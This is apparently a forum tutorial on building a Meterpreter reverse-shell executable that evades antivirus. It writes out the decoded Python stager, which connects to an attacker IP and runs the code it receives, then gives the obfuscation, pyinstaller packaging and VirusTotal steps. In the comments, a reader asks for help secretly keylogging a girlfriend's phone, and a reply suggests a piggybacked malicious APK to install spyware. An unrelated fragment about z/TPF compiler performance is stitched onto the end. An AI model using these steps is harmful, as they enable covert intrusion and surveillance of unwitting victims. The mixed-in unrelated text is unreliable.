coordinates float x = ReadBigEndianFloat(br); float y = ReadBigEndianFloat(br); float z = ReadBigEndianFloat(br); // Read and extract our RGB values UInt16 rgb = ReadBigEndianShort(br); int r = (rgb >> 11) * 255 / 31; int g = ((rgb >> 5) & 63) * 255 / 63; int b = (rgb & 31) * 255 / 31; // Write the point with its color to file sw.WriteLine( "{0},{1},{2},{3},{4},{5}", x, y, z, r, g, b ); } } catch (System.Exception ex) { _ed.WriteMessage( "\nError processing point cloud file " + "\"points_{0}\": {1}", root, ex.Message ); } } // Delete our local .bin file File.Delete(loc); // Show some progress _pm.MeterProgress(); System.Windows.Forms.Application.DoEvents(); } } } } } return totalPoints; } private static int ReadCompressedInt(BinaryReader br) { int i = 0; byte b; do { b = br.ReadByte(); i = (i << 7) | (b & 127); } while (b < 128); return i; } private static float ReadBigEndianFloat(BinaryReader br) { byte[] b = br.ReadBytes(4); return BitConverter.ToSingle( new byte[] { b[3], b[2], b[1], b[0] }, 0 ); } private static UInt16 ReadBigEndianShort(BinaryReader br) { byte b1 = br.ReadByte(); byte b2 = br.ReadByte(); return (ushort)(b2 | (b1 << 8)); } } } The important thing to note about the signature of the ProcessPointCloud() function – which I’ve kept the same across the C# and F# implementations – is the way the dims variable works: this is a simple array – populated by querying the Photosynth web service – of the number of files to download for the various point clouds in the synth. For example: if a synth contains three point clouds, the first comprising 5 files, the second of 3 files and the third of 1 file, { 5, 3, 1 } would get passed into the function, which would then attempt to download the following files: points_0_0.bin, points_0_1.bin, points_0_2.bin, points_0_3.bin, points_0_4.bin, points_1_0.bin, points_1_1.bin, points_1_2.bin and points_2_0.bin. As mentioned earlier, I’ve recently change the approach to only download the first point cloud for each synth, so only the points_0_x.bin files will be downloaded and processed. Which means dims will now always only have one entry. The above code works in a very linear fashion: download a file, process it, download the next, process that, etc. Now let’s take a look at the equivalent Asynchronous Workflows implementation in F#: module PhotosynthProcAsyncFs open System.Globalization open System.Threading open System.Text open System.Net open System.IO open System // We need the SynchronizationContext of the UI thread, // to allow us to make sure our UI update events get // processed correctly in the calling application let mutable syncContext : SynchronizationContext = null // Asynchronous Worker courtesy of Don Syme: //- // parallel-design-patterns-in-f-reporting-progress-with- // events-plus-twitter-sample.aspx type Agent<'T> = MailboxProcessor<'T> type SynchronizationContext with // A standard helper extension method to raise an event on // the GUI thread member syncContext.RaiseEvent (event: Event<_>) args = syncContext.Post((fun _ -> event.Trigger args),state=null) type AsyncWorker<'T>(jobs: seq<Async<'T>>) = // Each of these lines declares an F# event that we can raise let allCompleted = new Event<'T[]>() let error = new Event<System.Exception>() let canceled = new Event<System.OperationCanceledException>() let jobCompleted = new Event<int * 'T>() let cancellationCapability = new CancellationTokenSource() // Start an instance of the work member x.Start() = // Capture the synchronization context to allow us to raise // events back on the GUI thread if syncContext = null then syncContext <- SynchronizationContext.Current if syncContext = null then raise( System.NullReferenceException( "Synchronization context is null.")) // Mark up the jobs with numbers let jobs = jobs |> Seq.mapi (fun i job -> (job,i+1)) let work = Async.Parallel [ for (job,jobNumber) in jobs -> async { let! result = job syncContext.RaiseEvent jobCompleted (jobNumber,result) return result } ] Async.StartWithContinuations( work, (fun res -> syncContext.RaiseEvent allCompleted res), (fun exn -> syncContext.RaiseEvent error exn), (fun exn -> syncContext.RaiseEvent type PointCloudProcessor() = // Mutable state to track progress and results let mutable jobsComplete = 0 let mutable jobsFailed = 0 let mutable totalJobs = 0 let mutable totalPoints = 0 let mutable completed = false // Event to allow caller to update the UI let jobCompleted = new Event<string * int>() // Function to access a stream asynchronously let httpAsync(url:string) = async { let req = WebRequest.Create(url) let! rsp = req.AsyncGetResponse() return rsp.GetResponseStream() } // Functions to read data from our point stream let rec readCompressedInt (i:int) (br:BinaryReader) = let b = br.ReadByte() let i = (i <<< 7) ||| ((int)b &&& 127) if (int)b < 128 then readCompressedInt i br else i let readBigEndianFloat (br:BinaryReader) = let b = br.ReadBytes(4) BitConverter.ToSingle( [| b.[3]; b.[2]; b.[1]; b.[0] |], 0) let readBigEndianShort (br:BinaryReader) = let b1 = br.ReadByte() let b2 = br.ReadByte() ((uint16)b2 ||| ((uint16)b1 <<< 8)) // Recursive function to read n points from our stream // (We use an accumulator variable to enable tail-call // optimization) let rec readPoints acc n br = if n <= 0 then acc else // Read our coordinates let x = readBigEndianFloat br let y = readBigEndianFloat br let z = readBigEndianFloat br // Read and extract our RGB values let rgb = readBigEndianShort br let r = (rgb >>> 11) * 255us / 31us let g = ((rgb >>> 5) &&& 63us) * 255us / 63us let b = (rgb &&& 31us) * 255us / 31us readPoints ((x,y,z,r,g,b) :: acc) (n-1) br // Function to extract the various point information // from a stream corresponding to a single point file let extractPoints br = // First information is the file version // (for now we support version 1.0 only) let majVer = readBigEndianShort br let minVer = readBigEndianShort br if (int)majVer <> 1 || (int)minVer <> 0 then [] else // Clear some header bytes we don't care about let n = readCompressedInt 0 br for i in 0..(int)n-1 do let m = readCompressedInt 0 br for j in 0..(int)m-1 do readCompressedInt 0 br |> ignore readCompressedInt 0 br |> ignore // Find out the number of points in the file let npts = readCompressedInt 0 br // Read and return the points readPoints [] npts br // Recursive function to create a string from a list // of points. Our accumulator is a StringBuilder, // which is the most efficient way to collate a // string let rec pointsToString (acc : StringBuilder) pts = match pts with | [] -> acc.ToString() | (x:float32,y:float32,z:float32,r,g,b) :: t -> acc.AppendFormat( "{0},{1},{2},{3},{4},{5}\n", x.ToString(CultureInfo.InvariantCulture), y.ToString(CultureInfo.InvariantCulture), z.ToString(CultureInfo.InvariantCulture), r,g,b) |> ignore pointsToString acc t // Expose an event that's subscribable from C#/VB [<CLIEvent>] member x.JobCompleted = jobCompleted.Publish // Property to indicate that we're done member x.IsComplete = completed // Property to find out of any fyailures member x.Failures = jobsFailed // Property to return the results member x.TotalPoints = totalPoints // Our main function to download and process the point // cloud(s) associated with a particular Photosynth member x.ProcessPointCloud baseUrl dims txtPath = // A local function to add the URL prefix to each file let pathToFile file = baseUrl + file // Generate our list of files from the list of dimensions // of the various point clouds // Each entry in dims corresponds to the number of files: // dims[0] = 5 means "points_0_0.bin" .. "points_0_4.bin" // dims[6] = 3 means "points_6_0.bin" .. "points_6_2.bin" let files = Array.mapi (fun i d -> Array.map (fun j -> sprintf "%d_%d.bin" i j) [| 0..d-1 |] ) dims |> Array.concat |> List.ofArray // Set/reset mutable state totalJobs <- files.Length jobsComplete <- 0 // Open the local, temporary text file to hold our points let t = new FileInfo(txtPath) let sw = t.Create() // An agent to store our points in the file... // Loops and receives messages, so that we ensure we don't // have a conflict of simultaneous writes let fileAgent = Agent.Start(fun inbox -> async { while true do let! (msg : string) = inbox.Receive() do! sw.AsyncWrite(Encoding.ASCII.GetBytes(msg)) }) // Our basic asynchronous task to process a file, returning // the number of points let processFile (file:string) = async { let! stream = httpAsync file use reader = new BinaryReader(stream) let pts = extractPoints reader pointsToString (new StringBuilder()) pts |> fileAgent.Post return file, pts.Length } // Our jobs are a set of tasks, one for each file let jobs = [for file in files -> pathToFile file |> processFile] // Create our AsyncWorker for our jobs let worker = new AsyncWorker<_>(jobs) // Raise an event when each file is processed and update // our internal state worker.JobCompleted.Add(fun (jobNumber, (url , ptnum)) -> let file = url.Substring(url.LastIndexOf('/')+1) jobsComplete <- jobsComplete + 1 syncContext.RaiseEvent jobCompleted (file, ptnum) // If the last job, close our temporary file if jobsComplete = totalJobs then sw.Close() sw.Dispose() ) // Raise an event when an error occurs worker.Error.Add(fun ex -> jobsComplete <- jobsComplete + 1 jobsFailed <- jobsFailed + 1 syncContext.RaiseEvent jobCompleted ("Failed", 0) ) // Raise an event on cancellation worker.Canceled.Add(fun ex -> worker.CancelAsync() jobsComplete <- totalJobs jobsFailed <- totalJobs ) // Once we're all done, set the results as state to be // accessed by our calling routine worker.AllCompleted.Add(fun results -> totalPoints <- Array.sumBy snd results completed <- true) // Now start the work worker.Start() This implementation makes use of the AsyncWorker<> class: a standard design pattern implemented by Don Syme to report progress during a series of asynchronous tasks. We have events – raised on the UI thread, which means we can call back into AutoCAD safely – for when tasks complete, fail or get cancelled. Let’s take a closer look at the core function in this implementation, that which processes a single file: 1 let processFile (file:string) = 2 async { 3 let! stream = httpAsync file 4 use reader = new BinaryReader(stream) 5 let pts = extractPoints reader 6 pointsToString (new StringBuilder()) pts |> fileAgent.Post 7 return file, pts.Length 8 } The first line names the function and declares it to take a string argument. The second line says the whole operation is to be considered an asynchronous task, which means it can be executed in a non-blocking way. The third line is the only actual call that is made asynchronously, as denoted by the “!”, which tells the F# compiler to call the function but only continue with the assignment and the code following it once the results arrive. The rest of the code actually just takes the downloaded file and processes its contents by using a BinaryReader and extracting the various points in a very linear fashion. There was really no advantage to be had in attempting to make the processing asynchronous – the real benefit is derived from performing the download asynchronously rather than the processing. One important point about the way this code works: it’s all very well requesting data which then gets processed in a random order as it arrives back, but we do need to coordinate placing that data into our text file (which, as you saw in the process diagram, will then get processed into a LAS file before that, in turn, gets indexed into a PCG and attached inside an AutoCAD drawing). The points can come in any order – we’re not fussy about the ordering – but they do need to all make it in there. The way I’ve approached that is to use a agent-based message-passing (as described in more detail in this blog post). This sets up a central mailbox for requests to write to out text file: as the messages get processed, the points get added to the file. What’s important to note about these “tasks”: we have spent all out time saying what needs to happen – not when. The timing of the execution of these tasks is handled completely by the F# runtime and the .NET Framework – we really don’t need to care about how and when things happen. Just to make sure there wasn’t any inherent benefit from using F# rather than C#, I also implemented an additional “F# synchronous” mode. The code is provided in the project associated with this class. What’s potentially of more interest is the approach I’ve used to switch between the various implementations: I’ve used a capability in AutoCAD 2011 allowing system variables to be added via the Registry. Here’s the .reg file I’ve used to do this: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Autodesk\AutoCAD\R18.1\ACAD-9001:409\Variables\BROWSEPSSYNC] "StorageType"=dword:00000002 "LowerBound"=dword:00000000 "UpperBound"=dword:00000002 "PrimaryType"=dword:0000138b @="0" [HKEY_LOCAL_MACHINE\SOFTWARE\Autodesk\AutoCAD\R18.1\ACAD-9001:409\Variables\BROWSEPSLOG] "StorageType"=dword:00000002 "LowerBound"=dword:00000000 "UpperBound"=dword:00000001 "PrimaryType"=dword:0000138b @="0" This adds two sysvars to AutoCAD: - BROWSEPSSYNC – an integer between 0 and 2, stored per-user - Used to indicate the synchrony mode: - 0 = C# synchronous - 1 = F# synchronous - 2 = F# asynchronous - BROWSEPSLOG – an integer between 0 and 1, stored per-user - Used to indicate whether to save the performance information in a log file We’re then able to get the values of these system variables using (for instance) Application.GetSystemVariable(“BROWSEPSSYNC”) in our code. The IMPORTPS implementation now uses the appropriate user-selected synchrony mode, and – optionally – stores the performance data in “Documents\Photosynth Point Clouds\log.txt”. To put the code through its paces, I modified the mode before importing each of a number of my favourite synths, in increasing order of size: Vietnam Memorial Statue using C# synchronous: 46293 points from 10 files in 00:00:06.7260000 Vietnam Memorial Statue using F# synchronous: 46293 points from 10 files in 00:00:02.3120000 Vietnam Memorial Statue using F# asynchronous: 46293 points from 10 files in 00:00:01.5560000 National Geographic - Sphinx using C# synchronous: 102219 points from 21 files in 00:00:17.3470000 National Geographic - Sphinx using F# synchronous: 102219 points from 21 files in 00:00:16.5290000 National Geographic - Sphinx using F# asynchronous: 102219 points from 21 files in 00:00:04.2920000 L'epee de la Tene using C# synchronous: 405998 points from 82 files in 00:00:57.8160000 L'epee de la Tene using F# synchronous: 405998 points from 82 files in 00:00:54.2560000 L'epee de la Tene using F# asynchronous: 405998 points from 82 files in 00:00:08.3740000 Another Tres Yonis Synth using C# synchronous: 1141257 points from 229 files in 00:03:56.0490000 Another Tres Yonis Synth using F# synchronous: 1141257 points from 229 files in 00:04:20.4900000 Another Tres Yonis Synth using F# asynchronous: 1141257 points from 229 files in 00:00:21.3790000 Just to be clear: I did change the order of the execution – to make sure “C# synchronous” didn’t have the disadvantage of pulling down data that was cached for the other modes – but I’ve reordered them for ease of reading (it didn’t change anything at all in terms of results). Here’s the data in a graphical form: We can see that the difference in performance between C# and F# when working synchronously is modest: F# seems a bit quicker overall by then C# was much a bit quicker on the largest. But both were blown away by F# asynchronous: at worst F# async was 4 times faster, but at best it was 12 times faster!
http://through-the-interface.typepad.com/through_the_interface/2010/11/au-2010-handout-integrate-f-into-your-c-or-vbnet-application-for-an-8x-performance-boost.html
CC-MAIN-2017-51
refinedweb
4,284
52.8
SSL Everywhere! Secured connections and privacy are a must, particularly if you handle sensitive or confidential customer data. What’s more, a secured connection improves the reliability of persistent connections with proxies and firewalls, and can in some situations result in speed improvements. So, we’ve made SSL available everywhere. It’s now available on all plans, including Bootstrap and the free Sandbox plan. This also means that no matter the plan you’re on you get the same level of functionality from Pusher. Si Señor! I’ve used Pusher with SSL for years. What’s the difference? True. From the very beginning we’ve offered SSL access to the WebSocket API using WSS and HTTPS has been available on our HTTP endpoints. In fact, over 70% of client connections (WebSocket and HTTP fallback) use SSL protocol. The difference is that we’re now moving towards making SSL the default for our libraries so that everybody automatically gets the benefits. Also, all of our assets are now served over HTTPS for your added security. The website and blog have just been moved to HTTPS to catch up with the application dashboard, JavaScript library CDN, support site and status page which have long been on HTTPS. That’s great! Will prices change? Nope. We’ll keep things sweet and simple: SSL will be included by default on all plans at no extra cost – including the free Sandbox plan. How do I take advantage of SSL with Pusher? The Android (Java) and iOS (ObjectiveC) libraries have already been updated to do this. But, for the moment you’ll need to configure some of the other Pusher libraries to use SSL. For example, the Pusher JavaScript WebSocket library: <script src="//js.pusher.com/2.2/pusher.min.js"></script> <script> var pusher = new Pusher( 'APP_KEY', { encrypted: true } ); </script> And the HTTP API libraries. A few examples include: Ruby gem 'pusher' Pusher.app_id = 'APP_ID' Pusher.key = 'APP_KEY' Pusher.secret = 'APP_SECRET' Pusher.encrypted = true This example uses the pusher-http-ruby library PHP require 'vendor/autoload.php'; $pusher = new Pusher( 'APP_KEY', 'APP_SECRET', 'APP_ID', array( 'encrypted' => true ) ); This example uses the Pusher HTTP PHP library Python from pusher import Config, Pusher config=Config(app_id=u'4', key=u'key', secret=u'secret', ssl=True) pusher = Pusher(config) This example uses the Pusher HTTP Python library Node var Pusher = require( 'pusher' ); var config = { appId: 'APP_ID', key: 'APP_KEY', secret: 'APP_SECRET', encrypted: true }; var pusher = new Pusher( config ); This example uses the Pusher HTTP Node library If the library you use is not listed above then you should be able to find it via the libraries page. From there each library README should list how to use SSL. If it doesn’t then please either raise an issue against the repo or get in touch.
https://blog.pusher.com/ssl-everywhere/
CC-MAIN-2018-05
refinedweb
466
55.44
The terms "Model View Controller" and "Model View Presenter" (MVP) are used to describe patterns that have been in use for some time in other technology areas but have recently come to the fore in the C# world. The Model View Presenter is a derivation of the Model View Controller pattern. With modern ides such as Visual Studio inserting event handling into what we refer to as the view, it makes sense to leave them there rather than trying to implement them on a controller. I struggled to find a simple MVP example on the web that was geared towards C# WinForms, and after reading Bill McCafferty's excellent article on MVP within ASP.NET, I decided to throw my hat into the ring. I'm going to concentrate on the code. For a background on MVP, I suggest you try this link: The Model View Presenter pattern is designed to abstract the display of data away from the data and associated actions (e.g., saving the state). This, in theory, should make testing easier and more relevant, and remove the tight coupling typically found between data and forms within the Windows environment. The View is a user control that inherits from System.Windows.Forms. Its role in life is to display whatever data we are interested in. It contains no logic other than raising an event should the data change and any processing particular to the View such as closing itself happens. It doesn't care if anybody is listening to the event, it simply raises the event and has fulfilled its purpose. The View implements an interface that exposes fields and events that the Presenter needs to know about. System.Windows.Forms public class UserView : Form, IUserView It is a representation of the data being manipulated. In my simple example, this a user object. The Model should implement an interface (IUserModel) that exposes fields that the Presenter will update when they change in the View. IUserModel public class UserModel : IUserModel The Presenter marries the View to the Model. When first called, it updates all the properties of the View to correspond to the Model. Furthermore, it binds the View's events to methods in itself. Typically, the Presenter will update the Model based on changes in the View. Once a user has finished making changes in the View, the Model should be in sync and will be saved down correctly. The Presenter does not require an interface. public UserPresenter(IUserModel model,IUserView view) { this._model = model; this._view = view; this.SetViewPropertiesFromModel(); this.WireUpViewEvents(); } In my example, I use Reflection to iterate through the properties of the View / Model and update the corresponding field. Reflection is slow, but I haven't experienced any tangible slow down in any of my Windows apps yet - it would be easy to pass through a reference to the specific property being updated if speed starts to become an issue. IUserModel model = new UserModel(); IUserView view = new UserView(); new UserPresenter(model,view); view.Show(); The code to get the ball rolling is simplicity itself, as shown above. The example with this article includes some tests. Because our Presenter expects interfaces as opposed to concrete objects, it allows us to perform dependency injection with stubs and mocks, should we choose. [Test] public void DoesViewCorrespondToModel() { StubView stub = new StubView(); new UserPresenter(this._mock, stub); In my tests, I have a StubView that implements the IUserView interface. I then instantiate a mock object representing the Model and perform testing on that. My tests check that the View shows what's in the Model and that the Model is updated when the View changes. You would, of course, include more tests in a real world project. StubView IUserView My stub implements Event Mocking, e.g.: public void FireDataChanged() { if (this.DataChanged != null) { this.DataChanged(null, EventArgs.Empty); } } From within my test, I simply call 'FireDataChanged' to recreate what would happen when a user changes any of the data in my View from within the application. FireDataChanged You may be wondering why I go to the trouble of implementing code in the Presenter to update the Model / View when Microsoft kindly provides us with databinding technology to bind data to Windows controls. The great thing about databinding is that it removes the need for having to write code in every Presenter to take care of the state, thus speeding the development cycle. The problem with databinding is that it breaks our encapsulation by tightly coupling the 'View' to the data. Also, it cannot be tested from within an NUnit environment. However, one still needs to write laborious code within the Presenter to keep the Model in sync with the View. I hope that the code example I have provided you with that uses Reflection will ease this pain. Simply expose the data you require in the View and Model interfaces, and it should all be taken care of for you. I am not a pattern zealot; you may find that given time constraints and the nature of a task you need to perform, a tightly bound view using databinding is the best option - however, I would encourage the abstraction of logic from presentation and the use of tests wherever possible. It became apparent in the development of this article that a lot of property definitions are shared between the IView and IModel interfaces. In fact, every editable data property exposed on the Model needs to be implemented on the View; you may, therefore, like to consider implementing an additional interface called ICommonFields that is implemented by both IModel and IView. The benefit of this approach is that one only needs to add a new property to a single interface for the compiler to insist on its implementation in both the Model and the View. IView IModel ICommonFields Using MVP within WinForms is a learning curve, and I am keen to hear constructive criticism from anyone who thinks the example I have provided can be improved. By sharing knowledge, we all gain. The MVP pattern has been developed by many coders over a long period of time. Martin Fowler presents that knowledge in a nice concise form on his website (link at the top of the article). Thanks to Bill McCafferty for investing so much time in the article he wrote about MVP in ASP.NET (link at the top of article) which inspired me to submit a WinForms focused article. This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) SetViewPropertiesFromModel() SetModelPropertiesFromView() _view_DataChanged PropertyInfo General News Suggestion Question Bug Answer Joke Rant Admin Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. News on the future of C# as a language
http://www.codeproject.com/Articles/14660/WinForms-Model-View-Presenter?msg=2687197
CC-MAIN-2014-10
refinedweb
1,132
61.06
Pages: 1 hello guys, i have a very annoying problem with libpypac, python uses dynamically binary loading and that means that if i should install python with libpypac i'll be in trouble, scenario: i run "lazy-pac-cli -S python" and the steps taken by libpypac are, 1. Download the new python version 2. Uninstall the old version 3. Install the new version you see, when step three comes there is missing stuff that has'nt been used before, i've thought of making o dummypackage or something, arch + gentoo + initng + python = enlisy Offline missing stuff? You might indeed try loading the binaries you need first before doing the uninstall, so they are resident in memory before the step 2. The other thing you could do is, upon finding out your are going to be updating python, make a temp dir copy of the binaries you need, load them there, then perform the install, then remove the copies and load the new ones. "Be conservative in what you send; be liberal in what you accept." -- Postel's Law "tacos" -- Cactus' Law "t̥͍͎̪̪͗a̴̻̩͈͚ͨc̠o̩̙͈ͫͅs͙͎̙͊ ͔͇̫̜t͎̳̀a̜̞̗ͩc̗͍͚o̲̯̿s̖̣̤̙͌ ̖̜̈ț̰̫͓ạ̪͖̳c̲͎͕̰̯̃̈o͉ͅs̪ͪ ̜̻̖̜͕" -- -̖͚̫̙̓-̺̠͇ͤ̃ ̜̪̜ͯZ͔̗̭̞ͪA̝͈̙͖̩L͉̠̺͓G̙̞̦͖O̳̗͍ Offline I always thought that python loaded up everything it needed when you imported things, so as long as enough to get libpypac going is in ram it should work.... Why dont you try it and see what happens? and if it breaks, call pacman in. Offline @cactus it should be "stuff missing" i guess, i want to do it as your first suggestion but i can't figure out how to do it, a temporary dir sounds like an ugly workaround even if it might work, how does the real pacman do it with glibc, that should be like the same problem, @iphitus i've thought so too but look here what happens: [root@UFU abs]# ./lazy-pac-cli -S python The package is already installed in the system. The following packages will be installed with python: python-2.4.1-1 Total compressed size: 9.9 MB Proceed with the installation? [y/n] y Downloading python ... ... checking md5sum ... done. Installing python ... Traceback (most recent call last): File "./lazy-pac-cli", line 22, in ? main.install_control(sys.argv) File "/home/xerxes2/programs/abs/main.py", line 195, in install_control install_binary(dep_list, None) File "/home/xerxes2/programs/abs/main.py", line 137, in install_binary retcode = libpypac.install(package, i, depends_list, noupgrade_list, reason, oldver, None) File "/home/xerxes2/programs/abs/libpypac.py", line 584, in install tar = tarfile.open(cache_dir + package + ".pkg.tar.gz", "r:gz") File "/usr/lib/python2.4/tarfile.py", line 896, in open File "/usr/lib/python2.4/tarfile.py", line 948, in gzopen tarfile.CompressionError: gzip module is not available hmm, it looks like it is some shared binary missing, "gzip module" arch + gentoo + initng + python = enlisy Offline try importing 'gzip' before hand so it's preloaded? Offline yes, i've found the problem now, it's the "tarfile" module that uses dynamically loading of other python modules it's using, taken from tarfile.py def gzopen(cls, name, mode="r", fileobj=None, compresslevel=9): """Open gzip compressed tar archive name for reading or writing. Appending is not allowed. """ if len(mode) > 1 or mode not in "rw": raise ValueError, "mode must be 'r' or 'w'" try: import gzip gzip.GzipFile except (ImportError, AttributeError): raise CompressionError, "gzip module is not available" how the hell should i solve this? arch + gentoo + initng + python = enlisy Offline try importing 'gzip' before hand so it's preloaded? yiippppiiiiiiieee!!!! thanks aussie! that worked, a simple "import gzip" at the top of libpypac solved it, 8) edit: [root@UFU abs]# ./lazy-pac-cli -S python The package is already installed in the system. The following packages will be installed with python: python-2.4.1-1 Total compressed size: 9.9 MB Proceed with the installation? [y/n] y Using package for python from cache ... ... checking md5sum ... done. Installing python ... ... done. The package is installed, enjoy! arch + gentoo + initng + python = enlisy Offline Pages: 1
https://bbs.archlinux.org/viewtopic.php?pid=96758
CC-MAIN-2017-30
refinedweb
684
65.32
Creating an Completely Undetectable Executable in Under 15 Minutes! Hello everyone, this is my first post so play nice with me. We are going to create an undetectable (meterpreter/shell/vnc) executable in under 15 minutes. Hence forth, what I mean by undetectable is that it is undetected by 0 antivirus. Trust me I 've tried and it's possible. But you ask, how is this possible? Let me explain how AV's detect threats in quick and simple language. When you scan an .exe or any other file, it doesn't scan the actual code for bad stuff. It copies the signature and searches it's database if it's a threat or not. Simple. Typically many new executables aren't detected until it's too late. So, how do we change the signature, how we infect the user? Let's do this! Note: All tools used were used under a fresh kali system. Meaning that all tools are already preinstalled. Step 1: Boot Up Kali and Create a Basic Executable First we need to create a basic script from msfvenom to make the executable. Do the command: msfvenom -p python/meterpreter/reverse-underscore-tcp LHOST = ANYIP LPORT= ANY PORT R> anyname.py Here is mine. Step 2: Decrypting and Editing the Source Code Take the .py file you've created and open it with any text editor. It should look like this. Now we need to decrypt it with a base64 decryptor. Take the highlighted pink part and copy it. Paste it to any decryptor online. I used this website Click on decode and paste it into the text box. and look at that! We've decrypted the source code. Naturally this code is public knowledge and all AV's know about it. So let's change the code a bit. Copy the Source Code and paste it into encoder. Make some spaces between the code and add # Anything can go here make as much as you can. The more, the better. Here's what I did. #True import socket,struct #DANK s=socket.socket(2,socket.SOCK_STREAM) #WOW s.connect(('192.168.0.1',3333)) #YOU HAD ONE JOB l=struct.unpack('>I',s.recv(4))0 #NICE AV d=s.recv(l) #LOL NEVER MIND while len(d)<l: d+=s.recv(l-len(d)) #WHOA exec(d,{'s':s}) As you can see there there is some random messages that are placed in between the code. The # means comment so it doesn't affect the code and python will just skip it. This is for human codeproofers to see what's going on. Now. Once that's finished. Copy that code and paste it into the encoder. That's a lot of symbols. Copy the output and paste into the pink part of the python script you opened earlier. As you can see, it dramatically increased the size of the code. Save it now. Step 3: Convert It into an Executable EXE's. Now, unless you are attacking a Windows based client there is no need for this. Linux is built-in python support. (At least to some extent) Mac has built-in python support. Windows doesn't, and the average consumer doesn't install python on their computer. So what do we do? Make it into an .exe executable Run the command: pyinstaller 'Your .py file here' thats it! Wait for it finish. Once it's finished it will place it in a specific directory. Usually it's in /root/dist/nameofyourfile/. Step 4: Testing the Executable Against the AV. Naturally this isn't a good idea because many AV's use virustotal to see new viruses. But it is perfect because a computer can never outsmart a always changing virus. So take your .exe file and scan it! As you can see we have a 0/54 detection ratio. Meaning no one found it! This has many uses. The scenarios are endless. GL, HF! 17 Responses Nice tutorial. I'll be checking it out tonight. Thanks. I'm having an issue with it. When I try to run it on Windows 7 64 bit, I get an error message of The version of this file is not compatible with the version of Windows... I'm guessing that it's because it's a 32bit exe on a 64 bit OS, but shouldn't pyinstaller make it compatible? It still won't work, even if I do not change anything in the source code. Any ideas on getting it to work? Hmm. Okay. It's a 64 bit os. So it should be able to work. There are other python to exe programs. Try to use py2exe. i got the same issue how did u manage it? Haven't figured it out yet. I pretty much gave up. I'd rather work with Shellter. i just learned about shellter but i am afraid that it will get cought by AV soon like veil evasion . i used to use aes encryption now anti viruses detects it. btw i have a question shellter doeesnt seem to start with full permission even though i am root in each step it says access denied rmem_error . i am using kali Excellent Nice tutorial, it´s working well, now I know an easy way to make my files fud! Yeah, I'm thinking about making a tool like veil-evasion. Hows that sound? This is a great tutorial! Why don't AVs scan the actual code? That will be unpractical, slow and almost impossible. Most executables are encrypted to protect people copying and pasting it. AV's don't have a human brain, meaning that they can't scan code and say 'Wait, the code looks really sketchy. I'm removing it.' But where AV's shine is the removal process. Once the AV finds it, your probably dead meat, I've had scenarios where Malwarebytes caught me but I killed it just in time. Anyway, most users don't need an anti-virus, just don't install sketchy programs. It's not entirely true that AVs don't scan the code. Signature analysis does static code analysis using extracted code patterns from previously analyzed malicious files. If a specific code pattern is found within a file, the AV will start flagging it and may potentially be seen as suspicious. If enough flags are raised, the file in question will be labelled as malicious depending on the level of sensitivity set in the AV. So in a sense, you could say that an AV knows whether a file is suspicious or not. P.S. Is your file supposed to be a PE file? It's seen as an ELF64 on the Virus Total scan. Personally I would disagree with your last statement. Drive by downloading malware attacks are increasing. They infect though vulnerabilities. But yeah, the majority of infections are user installed. It doesn't matter. Drive-by vulnerabilities are still being added or not at all into AV databases. Many AV's don't even fix or monitor vulnerabilities. That relies upon on the user downloading OS security updates. Users that use windows 10 are naturally unaffected to these, but anyone that uses anything else is affected. Can you please help me install keylogger remotely on my girlfriend's phone?? Meterpreter for Android doesn't have a built-in keylogger. However, you may create a malicious (.apk if android), to piggyback and install a more capable spying program. IMO, keylogging isn't really all that useful, I personally use it to gain passwords if they are text based. Otherwise you are just flooding every letter she types. That's all she wrote. Share Your Thoughts
https://null-byte.wonderhowto.com/forum/creating-completely-undetectable-executable-under-15-minutes-0175114/
CC-MAIN-2017-22
refinedweb
1,286
78.55
Hi Richly, I don't think a stack trace would be of much help, as nothing in it was from the EPiServer namespaces. As for reproducing the behaviour, I just set a breakpoint in the Index action in one of the page controllers and then inspected the value of RouteData.DataTokens["node"]. On a normal request the type for that object would be PageReference. Btw, the behaviour was also in Update 40 (I noticed it there first). Hi, When in edit mode and publishing a page, on the following request for the page, the "node" object in the route data dictionary is of type ContentReference and not PageReference. The type is PageReference again if the page is then selected in the page tree. Is this behaviour by design or a (known) bug? I was able to reproduce it with Alloy with update 50 (latest as of writing) of the Nuget packages. Cheers, Per Atle
https://world.optimizely.com/forum/developer-forum/CMS/Thread-Container/2015/1/node-object-is-contentreference-on-first-request-after-republish-of-page--bug/
CC-MAIN-2021-49
refinedweb
154
71.34
For those accustomed to programming with the z/OS C/C++ compiler for the TPF 4.1 system, the application landscape might seem identical in the z/TPF system. It is not. The performance guidelines you might have used in the past changed a little. This article explains these changes as applicable to gcc and g++. In the z/TPF system, everything is implemented as a shared object library; even traditional TPF assembler segments are members of a z/TPF-unique shared object type called a BAL shared object (BSO). There are no longer distinctions between DLL, DLM, or LLM library types. A shared object library must have at least one member and can consist of any number of members as needed to suit your design and implementation requirements. Any shared object can have only one entry point that is callable by an ENTxC service; but it may have multiple external entry points that are callable by external references. These types of entry points are resolved by the linkage editor and by the z/TPF system on a dynamic basis, invoking the system's enter/back service. Calls between members of the same shared object library are resolved without enter/back intervention. This linkage method is much faster than enter/back because the system does not have to participate. There is no longer an entity called "writeable static storage", as there was in TPF 4.1. In the z/TPF system, writable data pages (note the terminology change from "writeable static") do not cause copy activity unless you write to them. The pages are mapped to the current ECB virtual memory (EVM) as read-only shared pages and handled with copy-on-write processing in your EVM. The first time any copy-on-write page is written to (even for just one byte), the entire page is copied to a private page that is mapped to your EVM; the code uses this private page instead of the read-only copy. This operation is triggered by a hardware exception called a page fault, which also has performance costs associated with it. The compiler family and the object module formats have changed. The z/OS C/C++ compiler is no longer used and is replaced by gcc and g++. The PM1-PM3 load module and OBJ/XOBJ relocatable object formats were replaced by a single format called ELF, which is very similar in its relocatable (unlinked) and absolute (linked) forms and more readily understood than its predecessors. Every detail of the ELF format is well-documented. The following recommendations take all of these factors into consideration. 1. Disable the “common block” unless you understand its implications and costs. This Fortran-like extension of the C language is unique to gcc, and is enabled by default. Use the -fno-commoncommand line option to disable it. While inspired by Fortran, the term "common block" as applied to gcc is a misnomer; individual data objects are marked common in the relocatable object, not grouped into isolated blocks. Common data objects may reside in any ELF section. Use of this feature causes all data objects declared in file scope to be marked common in the relocatable object. A later link edit operation against two or more different relocatable objects maps identically named data objects marked common into the same storage address, irrespective of their possibly different types. This behavior can cause some seemingly unreproducible and asynchronous run-time errors when it is used naïvely. You can use the common block safely only if you are: (a) aware that it is in effect, and (b) understand its effects and 